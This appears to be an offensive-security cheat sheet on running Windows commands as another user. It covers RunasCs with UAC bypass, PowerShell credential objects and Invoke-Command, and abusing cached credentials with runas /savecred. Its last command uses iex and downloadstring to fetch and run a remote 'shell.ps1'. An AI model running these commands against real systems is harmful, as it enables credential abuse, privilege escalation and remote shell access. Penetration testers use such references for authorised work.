Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
RunasCS
.\RunasCs.exe '<USER>' '<PASSWORD>' "<CMD>" -l <LOGON_TYPE>
Sample Output:
TO-DO# Or
.\RunasCs.exe '<USER>' '<PASSWORD>' --bypass-uac "<CMD>" -l <LOGON_TYPE>
Sample Output:
TO-DO2 Interactive
3 Network
4 Batch
5 Service
7 Unlock
8 NetworkCleartext
9 NewCredentials
10 RemoteInteractive
11 CachedInteractive
Sample Output:
TO-DOCreate credential object
$username = '<DOMAIN>\<USER>'
Sample Output:
TO-DO$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output:
TO-DO$cred = New-Object System.Management.Automation.PSCredential($username, $password)
Sample Output:
TO-DO$username = '<DOMAIN>\<USER>'
Sample Output:
TO-DO$password = '<PASSWORD>'
Sample Output:
TO-DO$secstr = New-Object -TypeName System.Security.SecureString
Sample Output:
TO-DO$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
Sample Output:
TO-DO$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
Sample Output:
TO-DORunas (with cred object)
# Set computer to localhost if running locally
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME>
Sample Output:
TO-DO# If error, try
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME> -auth credssp
Sample Output:
TO-DO# Invoke command with config
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME> -ConfigurationName config_name
Sample Output:
TO-DOnew-pssession -computername . -credential $cred
Sample Output:
TO-DO# Switch to new session
enter-pssession 1
Sample Output:
TO-DORunas (with cache creds)
Check cache creds
cmdkey /list
Sample Output:
TO-DORun Command
# e.g. Upload and run a shell
runas /user:<DOMAIN>\<USER> /savecred "powershell iex(new-object net.webclient).downloadstring('http://<LOCAL_IP>/shell.ps1')"
Sample Output:
TO-DO